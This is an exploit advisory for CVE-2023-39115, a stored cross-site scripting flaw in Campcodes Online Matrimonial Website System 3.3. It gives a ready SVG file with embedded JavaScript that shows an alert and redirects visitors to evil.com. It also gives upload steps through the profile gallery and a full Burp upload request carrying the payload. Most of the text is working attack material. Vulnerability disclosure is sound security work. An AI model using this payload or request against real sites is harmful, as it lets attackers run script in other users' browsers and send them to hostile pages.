Campcodes Online Matrimonial Website System 3.3 Cross Site Scripting

`#########################################################################################################################################  
# Exploit Title: Vulnerability in Campcodes Online Matrimonial Website  
System v3.3 allows code execution via malicious SVG file upload  
# Date: 3-8-2023  
# Vendor Homepage: http://campcodes.com  
# Category: Web Application  
# Exploit Author: Rajdip Dey Sarkar  
# Version: 3.3  
# Tested on: Windows/Kali  
# CVE: CVE-2023-39115  
###########################################################################################################################################  
  
  
  
Description:  
----------------  
  
An arbitrary file upload vulnerability in Campcodes Online Matrimonial  
Website System Script v3.3 allows attackers to execute arbitrary code via  
uploading a crafted SVG file.  
  
  
SVG Payload  
------------------  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert("You have been hacked!!")  
  
  
window.location.href="https://evil.com"  
</script>  
</svg>  
  
  
Steps to reproduce  
--------------------------  
  
-Login with your creds  
-Navigate to this directory - /profile-settings  
-Click on Gallery -> Add New Image -> Browser -> Add Files  
-Choose the SVG file and upload done  
-Click the image!! Payload Triggered  
  
  
Burp Request  
-------------------  
  
POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Content-Type: multipart/form-data;  
boundary=---------------------------167707198418121100152548123485  
Content-Length: 1044  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create  
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;  
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="relativePath"  
  
null  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="name"  
  
file (1).svg  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="type"  
  
image/svg+xml  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert("You have been hacked!!")  
  
  
window.location.href="https://evil.com"  
</script>  
</svg>  
-----------------------------167707198418121100152548123485--  
  
  
`